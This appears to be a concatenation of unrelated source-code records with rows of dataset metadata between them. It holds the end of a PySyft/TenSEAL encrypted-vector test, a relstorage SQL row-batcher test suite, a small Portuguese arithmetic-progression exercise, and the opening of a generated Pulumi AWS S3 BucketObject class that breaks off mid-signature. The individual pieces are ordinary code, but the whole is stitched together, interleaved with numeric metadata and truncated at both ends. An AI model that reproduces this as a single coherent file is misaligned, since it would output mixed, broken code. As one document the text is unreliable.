    right_ptr = ts.ckks_vector(context, right).send(root_client, pointable=True)
    left_ptr.link_context(ctx_ptr)
    right_ptr.link_context(ctx_ptr)
    _almost_equal(decrypt(context, left_ptr.dot(right_ptr)), [10])
    # in-place variant mutates the left operand
    left_ptr.dot_(right_ptr)
    _almost_equal(decrypt(context, left_ptr), [10])
@pytest.mark.vendor(lib="tenseal")
def test_tenseal_ckksvector_matmul(
    context: Any, root_client: sy.VirtualMachineClient
) -> None:
    """Vector-matrix product via matmul(), its mm() alias, and in-place mm_()."""
    ctx_ptr = context.send(root_client, pointable=True)
    vec_ptr = ts.ckks_vector(context, [0, 1, 2, 3, 4]).send(root_client, pointable=True)
    vec_ptr.link_context(ctx_ptr)
    matrix = [
        [73, 0.5, 8],
        [81, -5, 66],
        [-100, -78, -2],
        [0, 9, 17],
        [69, 11, 10],
    ]
    # matmul and its mm alias must agree
    _almost_equal(decrypt(context, vec_ptr.matmul(matrix)), [157, -90, 153])
    _almost_equal(decrypt(context, vec_ptr.mm(matrix)), [157, -90, 153])
    # in-place variant mutates the pointer
    vec_ptr.mm_(matrix)
    _almost_equal(decrypt(context, vec_ptr), [157, -90, 153])
| 25.854167
| 86
| 0.687248
| 1,529
| 9,928
| 4.151733
| 0.083061
| 0.067738
| 0.073094
| 0.115942
| 0.883585
| 0.881537
| 0.871613
| 0.857593
| 0.852079
| 0.785444
| 0
| 0.050369
| 0.194098
| 9,928
| 383
| 87
| 25.921671
| 0.743032
| 0.016418
| 0
| 0.706612
| 0
| 0
| 0.011598
| 0
| 0
| 0
| 0
| 0
| 0.004132
| 1
| 0.066116
| false
| 0
| 0.024793
| 0
| 0.095041
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
813f2905840de6b9731c806830ee09779124e8a0
| 15,215
|
py
|
Python
|
src/relstorage/adapters/tests/test_batch.py
|
lungj/relstorage
|
e18394b0197f6b70708037f36defbd3fe3ee5137
|
[
"ZPL-2.1"
] | null | null | null |
src/relstorage/adapters/tests/test_batch.py
|
lungj/relstorage
|
e18394b0197f6b70708037f36defbd3fe3ee5137
|
[
"ZPL-2.1"
] | null | null | null |
src/relstorage/adapters/tests/test_batch.py
|
lungj/relstorage
|
e18394b0197f6b70708037f36defbd3fe3ee5137
|
[
"ZPL-2.1"
] | null | null | null |
##############################################################################
#
# Copyright (c) 2009 Zope Foundation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
from relstorage.tests import TestCase
from relstorage.tests import MockCursor
class RowBatcherTests(TestCase):
    """Tests for the generic RowBatcher.

    A RowBatcher buffers deletes and inserts against a cursor and flushes
    them as batched SQL statements; the MockCursor records the
    (statement, params) pairs that were actually executed.
    """
    def getClass(self):
        # Imported lazily so collection works even if the adapter is broken.
        from relstorage.adapters.batch import RowBatcher
        return RowBatcher
    def test_delete_defer(self):
        # A single delete is buffered (rows_added) but not executed yet.
        cursor = MockCursor()
        batcher = self.getClass()(cursor)
        batcher.delete_from("mytable", id=2)
        self.assertEqual(cursor.executed, [])
        self.assertEqual(batcher.rows_added, 1)
        self.assertEqual(batcher.size_added, 0)
        self.assertEqual(batcher.total_rows_inserted, 0)
        self.assertEqual(batcher.total_rows_deleted, 0)
        self.assertEqual(batcher.total_size_inserted, 0)
        # Deletes are grouped by (table, column-name tuple).
        self.assertEqual(dict(batcher.deletes),
                         {('mytable', ('id',)): set([(2,)])})
    def test_delete_multiple_column(self):
        # A delete keyed on several columns is grouped under the column tuple.
        cursor = MockCursor()
        batcher = self.getClass()(cursor)
        batcher.delete_from("mytable", id=2, tid=10)
        self.assertEqual(cursor.executed, [])
        self.assertEqual(batcher.rows_added, 1)
        self.assertEqual(batcher.size_added, 0)
        self.assertEqual(dict(batcher.deletes),
                         {('mytable', ('id', 'tid')): set([(2, 10)])})
    def test_delete_auto_flush(self):
        # Reaching the row limit (2) triggers an automatic flush;
        # sorted_deletes makes the parameter order deterministic.
        cursor = MockCursor()
        batcher = self.getClass()(cursor, 2)
        batcher.sorted_deletes = True
        batcher.delete_from("mytable", id=2)
        batcher.delete_from("mytable", id=1)
        self.assertEqual(cursor.executed,
                         [('DELETE FROM mytable WHERE id IN (%s,%s)', ((1, 2)))])
        self.assertEqual(batcher.rows_added, 0)
        self.assertEqual(batcher.size_added, 0)
        self.assertEqual(batcher.deletes, {})
        self.assertEqual(batcher.total_rows_inserted, 0)
        self.assertEqual(batcher.total_rows_deleted, 2)
        self.assertEqual(batcher.total_size_inserted, 0)
    def test_insert_defer(self):
        # An insert is buffered under (command, header, row schema, suffix)
        # keyed by rowkey; totals only change on flush.
        cursor = MockCursor()
        batcher = self.getClass()(cursor)
        batcher.insert_into(
            "mytable (id, name)",
            "%s, id || %s",
            (1, 'a'),
            rowkey=1,
            size=3,
        )
        self.assertEqual(cursor.executed, [])
        self.assertEqual(batcher.rows_added, 1)
        self.assertEqual(batcher.size_added, 3)
        self.assertEqual(batcher.inserts, {
            ('INSERT', 'mytable (id, name)', '%s, id || %s', ''): {1: (1, 'a')}
        })
        self.assertEqual(batcher.total_rows_inserted, 0)
        self.assertEqual(batcher.total_rows_deleted, 0)
        self.assertEqual(batcher.total_size_inserted, 0)
    def test_insert_defer_multi_table(self):
        # Inserts into different tables are buffered under separate keys.
        cursor = MockCursor()
        batcher = self.getClass()(cursor)
        batcher.insert_into(
            "mytable (id, name)",
            "%s, id || %s",
            (1, 'a'),
            rowkey=1,
            size=3,
        )
        # NOTE(review): ('a') is the bare string 'a', not a 1-tuple —
        # the expected dict below relies on that.
        batcher.insert_into(
            "othertable (name)",
            "?",
            ('a'),
            rowkey=1,
            size=1,
        )
        self.assertEqual(cursor.executed, [])
        self.assertEqual(batcher.rows_added, 2)
        self.assertEqual(batcher.size_added, 4)
        self.assertEqual(dict(batcher.inserts), {
            ('INSERT', 'mytable (id, name)', '%s, id || %s', ''): {1: (1, 'a')},
            ('INSERT', 'othertable (name)', '?', ''): {1: ('a')},
        })
        self.assertEqual(batcher.total_rows_inserted, 0)
        self.assertEqual(batcher.total_rows_deleted, 0)
        self.assertEqual(batcher.total_size_inserted, 0)
    def test_insert_replace(self):
        # The command keyword changes the buffered key from INSERT to REPLACE.
        cursor = MockCursor()
        batcher = self.getClass()(cursor)
        batcher.insert_into(
            "mytable (id, name)",
            "%s, id || %s",
            (1, 'a'),
            rowkey=1,
            size=3,
            command='REPLACE',
        )
        self.assertEqual(cursor.executed, [])
        self.assertEqual(batcher.rows_added, 1)
        self.assertEqual(batcher.size_added, 3)
        self.assertEqual(batcher.inserts, {
            ('REPLACE', 'mytable (id, name)', '%s, id || %s', ''): {1: (1, 'a')}
        })
    def test_insert_duplicate(self):
        # A second insert on the same rowkey replaces the first insert.
        # (rows_added/size_added still count both calls.)
        cursor = MockCursor()
        batcher = self.getClass()(cursor)
        batcher.insert_into(
            "mytable (id, name)",
            "%s, id || %s",
            (1, 'a'),
            rowkey=1,
            size=3,
        )
        batcher.insert_into(
            "mytable (id, name)",
            "%s, id || %s",
            (1, 'b'),
            rowkey=1,
            size=3,
        )
        self.assertEqual(cursor.executed, [])
        self.assertEqual(batcher.rows_added, 2)
        self.assertEqual(batcher.size_added, 6)
        self.assertEqual(batcher.inserts, {
            ('INSERT', 'mytable (id, name)', '%s, id || %s', ''): {1: (1, 'b')}
        })
    def test_insert_auto_flush(self):
        # Reaching size_limit flushes both rows as one multi-row INSERT.
        cursor = MockCursor()
        batcher = self.getClass()(cursor)
        batcher.size_limit = 10
        batcher.insert_into(
            "mytable (id, name)",
            "%s, id || %s",
            (1, 'a'),
            rowkey=1,
            size=5,
        )
        batcher.insert_into(
            "mytable (id, name)",
            "%s, id || %s",
            (2, 'B'),
            rowkey=2,
            size=5,
        )
        self.assertEqual(
            cursor.executed,
            [(
                'INSERT INTO mytable (id, name) VALUES\n'
                '(%s, id || %s),\n'
                '(%s, id || %s)\n',
                (1, 'a', 2, 'B'))
            ])
        self.assertEqual(batcher.rows_added, 0)
        self.assertEqual(batcher.size_added, 0)
        self.assertEqual(batcher.inserts, {})
        self.assertEqual(batcher.total_rows_inserted, 2)
        self.assertEqual(batcher.total_rows_deleted, 0)
        self.assertEqual(batcher.total_size_inserted, 10)
    def test_insert_auto_flush_multi_table(self):
        # NOTE(review): this is identical to test_insert_auto_flush and never
        # touches a second table — confirm whether a multi-table scenario
        # was intended here.
        cursor = MockCursor()
        batcher = self.getClass()(cursor)
        batcher.size_limit = 10
        batcher.insert_into(
            "mytable (id, name)",
            "%s, id || %s",
            (1, 'a'),
            rowkey=1,
            size=5,
        )
        batcher.insert_into(
            "mytable (id, name)",
            "%s, id || %s",
            (2, 'B'),
            rowkey=2,
            size=5,
        )
        self.assertEqual(
            cursor.executed,
            [(
                'INSERT INTO mytable (id, name) VALUES\n'
                '(%s, id || %s),\n'
                '(%s, id || %s)\n',
                (1, 'a', 2, 'B'))
            ])
        self.assertEqual(batcher.rows_added, 0)
        self.assertEqual(batcher.size_added, 0)
        self.assertEqual(batcher.inserts, {})
        self.assertEqual(batcher.total_rows_inserted, 2)
        self.assertEqual(batcher.total_rows_deleted, 0)
        self.assertEqual(batcher.total_size_inserted, 10)
    def test_flush(self):
        # An explicit flush runs single-column deletes, then multi-column
        # deletes, then inserts — using the custom delete placeholder.
        cursor = MockCursor()
        batcher = self.getClass()(cursor, delete_placeholder="?")
        # Make sure we preserve order in multi-column
        batcher.sorted_deletes = True
        batcher.delete_from("mytable", id=1)
        batcher.insert_into(
            "mytable (id, name)",
            "%s, id || %s",
            (1, 'a'),
            rowkey=1,
            size=5,
        )
        batcher.delete_from("mytable", id=1, key='abc')
        batcher.delete_from("mytable", id=2, key='def')
        batcher.flush()
        self.assertEqual(cursor.executed, [
            ('DELETE FROM mytable WHERE id IN (?)',
             ((1,))),
            ('DELETE FROM mytable WHERE (id=? AND key=?) OR (id=? AND key=?)',
             (1, 'abc', 2, 'def')),
            ('INSERT INTO mytable (id, name) VALUES\n(%s, id || %s)\n',
             (1, 'a')),
        ])
    def test_select_one(self):
        # A single oid produces a one-placeholder IN clause.
        cursor = MockCursor()
        batcher = self.getClass()(cursor)
        list(batcher.select_from(('zoid', 'tid'), 'object_state', oids=(1,)))
        self.assertEqual(cursor.executed, [
            ('SELECT zoid,tid FROM object_state WHERE oids IN (%s)',
             (1,))
        ])
    def test_select_multiple_one_batch(self):
        # All oids fit in one batch: one statement with four placeholders.
        cursor = MockCursor()
        batcher = self.getClass()(cursor)
        list(batcher.select_from(('zoid', 'tid'), 'object_state',
                                 oids=(1, 2, 3, 4)))
        self.assertEqual(cursor.executed, [
            ('SELECT zoid,tid FROM object_state WHERE oids IN (%s,%s,%s,%s)',
             (1, 2, 3, 4))
        ])
    def test_select_multiple_many_batch(self):
        # With row_limit = 2, five oids are fetched in three batches and the
        # per-batch result sets are concatenated.
        cursor = MockCursor()
        cursor.many_results = [
            [(1, 1)],
            [(3, 1)],
            []
        ]
        batcher = self.getClass()(cursor)
        batcher.row_limit = 2
        rows = batcher.select_from(('zoid', 'tid'), 'object_state',
                                   oids=(1, 2, 3, 4, 5))
        rows = list(rows)
        self.assertEqual(cursor.executed, [
            ('SELECT zoid,tid FROM object_state WHERE oids IN (%s,%s)',
             (1, 2,)),
            ('SELECT zoid,tid FROM object_state WHERE oids IN (%s,%s)',
             (3, 4,)),
            ('SELECT zoid,tid FROM object_state WHERE oids IN (%s)',
             (5,)),
        ])
        self.assertEqual(rows, [
            (1, 1),
            (3, 1)
        ])
class OracleRowBatcherTests(TestCase):
    """Tests for the Oracle batcher: INSERT ALL syntax, named binds,
    and cursor input sizes for raw (LOB-like) column types.
    """
    def getClass(self):
        from relstorage.adapters.oracle.batch import OracleRowBatcher
        return OracleRowBatcher
    def test_insert_one_row(self):
        # A single buffered row flushes as a plain INSERT statement.
        cursor = MockCursor()
        batcher = self.getClass()(cursor, {})
        batcher.insert_into(
            "mytable (id, name)",
            "%s, id || %s",
            (1, 'a'),
            rowkey=1,
            size=3,
        )
        self.assertEqual(cursor.executed, [])
        batcher.flush()
        self.assertEqual(cursor.executed, [
            ('INSERT INTO mytable (id, name) VALUES (%s, id || %s)', (1, 'a')),
        ])
    def test_insert_two_rows(self):
        # Multiple rows flush as one INSERT ALL; the named bind parameters
        # are suffixed _0, _1, ... per row.
        cursor = MockCursor()
        batcher = self.getClass()(cursor, {})
        batcher.insert_into(
            "mytable (id, name)",
            ":id, :id || :name",
            {'id': 1, 'name': 'a'},
            rowkey=1,
            size=3,
        )
        batcher.insert_into(
            "mytable (id, name)",
            ":id, :id || :name",
            {'id': 2, 'name': 'b'},
            rowkey=2,
            size=3,
        )
        self.assertEqual(cursor.executed, [])
        batcher.flush()
        self.assertEqual(
            cursor.executed,
            [(
                'INSERT ALL\n'
                'INTO mytable (id, name) VALUES (:id_0, :id_0 || :name_0)\n'
                'INTO mytable (id, name) VALUES (:id_1, :id_1 || :name_1)\n'
                'SELECT * FROM DUAL',
                {'id_0': 1, 'id_1': 2, 'name_1': 'b', 'name_0': 'a'})
            ])
    def test_insert_one_raw_row(self):
        # Raw column types are forwarded to cursor.setinputsizes.
        class MockRawType(object):
            pass
        cursor = MockCursor()
        batcher = self.getClass()(cursor, {'rawdata': MockRawType})
        batcher.insert_into(
            "mytable (id, data)",
            ":id, :rawdata",
            {'id': 1, 'rawdata': 'xyz'},
            rowkey=1,
            size=3,
        )
        batcher.flush()
        self.assertEqual(cursor.executed, [
            ('INSERT INTO mytable (id, data) VALUES (:id, :rawdata)',
             {'id': 1, 'rawdata': 'xyz'})
        ])
        self.assertEqual(cursor.inputsizes, {'rawdata': MockRawType})
    def test_insert_two_raw_rows(self):
        # Raw types get per-row suffixed input sizes in INSERT ALL mode.
        class MockRawType(object):
            pass
        cursor = MockCursor()
        batcher = self.getClass()(cursor, {'rawdata': MockRawType})
        batcher.insert_into(
            "mytable (id, data)",
            ":id, :rawdata",
            {'id': 1, 'rawdata': 'xyz'},
            rowkey=1,
            size=3,
        )
        batcher.insert_into(
            "mytable (id, data)",
            ":id, :rawdata",
            {'id': 2, 'rawdata': 'abc'},
            rowkey=2,
            size=3,
        )
        batcher.flush()
        self.assertEqual(
            cursor.executed,
            [(
                'INSERT ALL\n'
                'INTO mytable (id, data) VALUES (:id_0, :rawdata_0)\n'
                'INTO mytable (id, data) VALUES (:id_1, :rawdata_1)\n'
                'SELECT * FROM DUAL',
                {'id_0': 1, 'id_1': 2, 'rawdata_0': 'xyz', 'rawdata_1': 'abc'})
            ])
        self.assertEqual(cursor.inputsizes, {
            'rawdata_0': MockRawType,
            'rawdata_1': MockRawType,
        })
class PostgreSQLRowBatcherTests(TestCase):
    """Tests for the PostgreSQL batcher, which selects with
    ``= ANY (%s)`` and a list parameter instead of an IN clause.
    """
    def getClass(self):
        from relstorage.adapters.postgresql.batch import PostgreSQLRowBatcher
        return PostgreSQLRowBatcher
    def test_select_one(self):
        # One oid: a single ANY(...) statement with a one-element list.
        cursor = MockCursor()
        batcher = self.getClass()(cursor)
        list(batcher.select_from(('zoid', 'tid'), 'object_state', oids=(1,)))
        self.assertEqual(cursor.executed, [
            ('SELECT zoid,tid FROM object_state WHERE oids = ANY (%s)',
             ([1,],))
        ])
    def test_select_multiple_one_batch(self):
        # All oids fit in one batch: one ANY(...) with the full list.
        cursor = MockCursor()
        batcher = self.getClass()(cursor)
        list(batcher.select_from(('zoid', 'tid'), 'object_state',
                                 oids=(1, 2, 3, 4)))
        self.assertEqual(cursor.executed, [
            ('SELECT zoid,tid FROM object_state WHERE oids = ANY (%s)',
             ([1, 2, 3, 4],))
        ])
    def test_select_multiple_many_batch(self):
        # With row_limit = 2, five oids are fetched in three ANY(...) batches
        # and the per-batch results are concatenated.
        cursor = MockCursor()
        cursor.many_results = [
            [(1, 1)],
            [(3, 1)],
            []
        ]
        batcher = self.getClass()(cursor)
        batcher.row_limit = 2
        rows = batcher.select_from(('zoid', 'tid'), 'object_state',
                                   oids=(1, 2, 3, 4, 5))
        rows = list(rows)
        self.assertEqual(cursor.executed, [
            ('SELECT zoid,tid FROM object_state WHERE oids = ANY (%s)',
             ([1, 2,],)),
            ('SELECT zoid,tid FROM object_state WHERE oids = ANY (%s)',
             ([3, 4,],)),
            ('SELECT zoid,tid FROM object_state WHERE oids = ANY (%s)',
             ([5,],)),
        ])
        self.assertEqual(rows, [
            (1, 1),
            (3, 1)
        ])
| 34.038031
| 81
| 0.504174
| 1,591
| 15,215
| 4.702074
| 0.095537
| 0.142361
| 0.123513
| 0.085283
| 0.840262
| 0.815132
| 0.799091
| 0.770619
| 0.754712
| 0.717952
| 0
| 0.021474
| 0.341965
| 15,215
| 446
| 82
| 34.11435
| 0.725729
| 0.036872
| 0
| 0.743719
| 0
| 0
| 0.161005
| 0
| 0
| 0
| 0
| 0
| 0.178392
| 1
| 0.057789
| false
| 0.005025
| 0.012563
| 0
| 0.090452
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d49649cd5d03a06f37e0f2dae724b4d47acba39f
| 621
|
py
|
Python
|
python--exercicios/ex051.py
|
Eliezer2000/python
|
12abb54c6536acb2f36b8f34bf51ec765857eb75
|
[
"MIT"
] | null | null | null |
python--exercicios/ex051.py
|
Eliezer2000/python
|
12abb54c6536acb2f36b8f34bf51ec765857eb75
|
[
"MIT"
] | null | null | null |
python--exercicios/ex051.py
|
Eliezer2000/python
|
12abb54c6536acb2f36b8f34bf51ec765857eb75
|
[
"MIT"
] | null | null | null |
# Exercise 51: print the first 10 terms of an arithmetic progression.
# The same exercise is solved three times with different output separators;
# each version reads the first term ("primeiro termo") and the common
# difference ("razão") from the user.
primeiro = int(input('Primeiro termo : '))
razão = int(input('Razão : '))
# 10th term = first + (10 - 1) * difference
décimo = primeiro + (10 -1) * razão
# range stops after the 10th term; step is the common difference.
# NOTE(review): a zero "razão" raises ValueError (range step 0) — the
# exercise presumably assumes positive input.
for c in range(primeiro, décimo + razão, razão ):
    print('{}'.format(c), end='-> ')
print('ACABOU')
# Second version: terms separated by a single space.
primeiro = int(input('Primeiro número : '))
razão = int(input('Razão : '))
décimo = primeiro + (10 - 1) * razão
for c in range(primeiro, décimo + razão, razão):
    print('{}'.format(c), end=' ')
print('ACABOU')
# Third version: terms printed with no separator and no trailing message.
primeiro = int(input('Primeiro número : '))
razão = int(input('Razão : '))
décimo = primeiro + (10 -1) * razão
for c in range(primeiro, décimo + razão, razão):
    print('{}'.format(c), end='')
| 29.571429
| 49
| 0.613527
| 82
| 621
| 4.646341
| 0.207317
| 0.125984
| 0.125984
| 0.188976
| 0.923885
| 0.923885
| 0.923885
| 0.923885
| 0.923885
| 0.923885
| 0
| 0.01751
| 0.172303
| 621
| 20
| 50
| 31.05
| 0.723735
| 0
| 0
| 0.882353
| 0
| 0
| 0.161031
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.294118
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
d4abeb50c5df2331c4176605d9b867676ac8971d
| 29,192
|
py
|
Python
|
sdk/python/pulumi_aws/s3/bucket_object.py
|
mdop-wh/pulumi-aws
|
05bb32e9d694dde1c3b76d440fd2cd0344d23376
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_aws/s3/bucket_object.py
|
mdop-wh/pulumi-aws
|
05bb32e9d694dde1c3b76d440fd2cd0344d23376
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_aws/s3/bucket_object.py
|
mdop-wh/pulumi-aws
|
05bb32e9d694dde1c3b76d440fd2cd0344d23376
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Dict, List, Mapping, Optional, Tuple, Union
from .. import _utilities, _tables
__all__ = ['BucketObject']
class BucketObject(pulumi.CustomResource):
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
acl: Optional[pulumi.Input[str]] = None,
bucket: Optional[pulumi.Input[str]] = None,
cache_control: Optional[pulumi.Input[str]] = None,
content: Optional[pulumi.Input[str]] = None,
content_base64: Optional[pulumi.Input[str]] = None,
content_disposition: Optional[pulumi.Input[str]] = None,
content_encoding: Optional[pulumi.Input[str]] = None,
content_language: Optional[pulumi.Input[str]] = None,
content_type: Optional[pulumi.Input[str]] = None,
etag: Optional[pulumi.Input[str]] = None,
force_destroy: Optional[pulumi.Input[bool]] = None,
key: Optional[pulumi.Input[str]] = None,
kms_key_id: Optional[pulumi.Input[str]] = None,
metadata: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
object_lock_legal_hold_status: Optional[pulumi.Input[str]] = None,
object_lock_mode: Optional[pulumi.Input[str]] = None,
object_lock_retain_until_date: Optional[pulumi.Input[str]] = None,
server_side_encryption: Optional[pulumi.Input[str]] = None,
source: Optional[pulumi.Input[Union[pulumi.Asset, pulumi.Archive]]] = None,
storage_class: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
website_redirect: Optional[pulumi.Input[str]] = None,
__props__=None,
__name__=None,
__opts__=None):
"""
Provides a S3 bucket object resource.
## Example Usage
### Encrypting with KMS Key
```python
import pulumi
import pulumi_aws as aws
examplekms = aws.kms.Key("examplekms",
description="KMS key 1",
deletion_window_in_days=7)
examplebucket = aws.s3.Bucket("examplebucket", acl="private")
examplebucket_object = aws.s3.BucketObject("examplebucketObject",
key="someobject",
bucket=examplebucket.id,
source=pulumi.FileAsset("index.html"),
kms_key_id=examplekms.arn)
```
### Server Side Encryption with S3 Default Master Key
```python
import pulumi
import pulumi_aws as aws
examplebucket = aws.s3.Bucket("examplebucket", acl="private")
examplebucket_object = aws.s3.BucketObject("examplebucketObject",
key="someobject",
bucket=examplebucket.id,
source=pulumi.FileAsset("index.html"),
server_side_encryption="aws:kms")
```
### Server Side Encryption with AWS-Managed Key
```python
import pulumi
import pulumi_aws as aws
examplebucket = aws.s3.Bucket("examplebucket", acl="private")
examplebucket_object = aws.s3.BucketObject("examplebucketObject",
key="someobject",
bucket=examplebucket.id,
source=pulumi.FileAsset("index.html"),
server_side_encryption="AES256")
```
### S3 Object Lock
```python
import pulumi
import pulumi_aws as aws
examplebucket = aws.s3.Bucket("examplebucket",
acl="private",
versioning=aws.s3.BucketVersioningArgs(
enabled=True,
),
object_lock_configuration=aws.s3.BucketObjectLockConfigurationArgs(
object_lock_enabled="Enabled",
))
examplebucket_object = aws.s3.BucketObject("examplebucketObject",
key="someobject",
bucket=examplebucket.id,
source=pulumi.FileAsset("important.txt"),
object_lock_legal_hold_status="ON",
object_lock_mode="GOVERNANCE",
object_lock_retain_until_date="2021-12-31T23:59:60Z",
force_destroy=True)
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] acl: The [canned ACL](https://docs.aws.amazon.com/AmazonS3/latest/dev/acl-overview.html#canned-acl) to apply. Defaults to "private".
:param pulumi.Input[str] bucket: The name of the bucket to put the file in. Alternatively, an [S3 access point](https://docs.aws.amazon.com/AmazonS3/latest/dev/using-access-points.html) ARN can be specified.
:param pulumi.Input[str] cache_control: Specifies caching behavior along the request/reply chain Read [w3c cache_control](http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14.9) for further details.
:param pulumi.Input[str] content: Literal string value to use as the object content, which will be uploaded as UTF-8-encoded text.
:param pulumi.Input[str] content_base64: Base64-encoded data that will be decoded and uploaded as raw bytes for the object content. This allows safely uploading non-UTF8 binary data, but is recommended only for small content such as the result of the `gzipbase64` function with small text strings. For larger objects, use `source` to stream the content from a disk file.
:param pulumi.Input[str] content_disposition: Specifies presentational information for the object. Read [w3c content_disposition](http://www.w3.org/Protocols/rfc2616/rfc2616-sec19.html#sec19.5.1) for further information.
:param pulumi.Input[str] content_encoding: Specifies what content encodings have been applied to the object and thus what decoding mechanisms must be applied to obtain the media-type referenced by the Content-Type header field. Read [w3c content encoding](http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14.11) for further information.
:param pulumi.Input[str] content_language: The language the content is in e.g. en-US or en-GB.
:param pulumi.Input[str] content_type: A standard MIME type describing the format of the object data, e.g. application/octet-stream. All Valid MIME Types are valid for this input.
:param pulumi.Input[str] etag: Used to trigger updates. The only meaningful value is `${filemd5("path/to/file")}` (this provider 0.11.12 or later) or `${md5(file("path/to/file"))}` (this provider 0.11.11 or earlier).
This attribute is not compatible with KMS encryption, `kms_key_id` or `server_side_encryption = "aws:kms"`.
:param pulumi.Input[bool] force_destroy: Allow the object to be deleted by removing any legal hold on any object version.
Default is `false`. This value should be set to `true` only if the bucket has S3 object lock enabled.
:param pulumi.Input[str] key: The name of the object once it is in the bucket.
:param pulumi.Input[str] kms_key_id: Specifies the AWS KMS Key ARN to use for object encryption.
This value is a fully qualified **ARN** of the KMS Key. If using `kms.Key`,
use the exported `arn` attribute:
`kms_key_id = "${aws_kms_key.foo.arn}"`
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] metadata: A map of keys/values to provision metadata (will be automatically prefixed by `x-amz-meta-`, note that only lowercase label are currently supported by the AWS Go API).
:param pulumi.Input[str] object_lock_legal_hold_status: The [legal hold](https://docs.aws.amazon.com/AmazonS3/latest/dev/object-lock-overview.html#object-lock-legal-holds) status that you want to apply to the specified object. Valid values are `ON` and `OFF`.
:param pulumi.Input[str] object_lock_mode: The object lock [retention mode](https://docs.aws.amazon.com/AmazonS3/latest/dev/object-lock-overview.html#object-lock-retention-modes) that you want to apply to this object. Valid values are `GOVERNANCE` and `COMPLIANCE`.
:param pulumi.Input[str] object_lock_retain_until_date: The date and time, in [RFC3339 format](https://tools.ietf.org/html/rfc3339#section-5.8), when this object's object lock will [expire](https://docs.aws.amazon.com/AmazonS3/latest/dev/object-lock-overview.html#object-lock-retention-periods).
:param pulumi.Input[str] server_side_encryption: Specifies server-side encryption of the object in S3. Valid values are "`AES256`" and "`aws:kms`".
:param pulumi.Input[Union[pulumi.Asset, pulumi.Archive]] source: The path to a file that will be read and uploaded as raw bytes for the object content.
:param pulumi.Input[str] storage_class: Specifies the desired [Storage Class](http://docs.aws.amazon.com/AmazonS3/latest/dev/storage-class-intro.html)
for the object. Can be either "`STANDARD`", "`REDUCED_REDUNDANCY`", "`ONEZONE_IA`", "`INTELLIGENT_TIERING`", "`GLACIER`", "`DEEP_ARCHIVE`", or "`STANDARD_IA`". Defaults to "`STANDARD`".
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A map of tags to assign to the object.
:param pulumi.Input[str] website_redirect: Specifies a target URL for [website redirect](http://docs.aws.amazon.com/AmazonS3/latest/dev/how-to-page-redirect.html).
"""
if __name__ is not None:
warnings.warn("explicit use of __name__ is deprecated", DeprecationWarning)
resource_name = __name__
if __opts__ is not None:
warnings.warn("explicit use of __opts__ is deprecated, use 'opts' instead", DeprecationWarning)
opts = __opts__
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = dict()
__props__['acl'] = acl
if bucket is None:
raise TypeError("Missing required property 'bucket'")
__props__['bucket'] = bucket
__props__['cache_control'] = cache_control
__props__['content'] = content
__props__['content_base64'] = content_base64
__props__['content_disposition'] = content_disposition
__props__['content_encoding'] = content_encoding
__props__['content_language'] = content_language
__props__['content_type'] = content_type
__props__['etag'] = etag
__props__['force_destroy'] = force_destroy
__props__['key'] = key
__props__['kms_key_id'] = kms_key_id
__props__['metadata'] = metadata
__props__['object_lock_legal_hold_status'] = object_lock_legal_hold_status
__props__['object_lock_mode'] = object_lock_mode
__props__['object_lock_retain_until_date'] = object_lock_retain_until_date
__props__['server_side_encryption'] = server_side_encryption
__props__['source'] = source
__props__['storage_class'] = storage_class
__props__['tags'] = tags
__props__['website_redirect'] = website_redirect
__props__['version_id'] = None
super(BucketObject, __self__).__init__(
'aws:s3/bucketObject:BucketObject',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
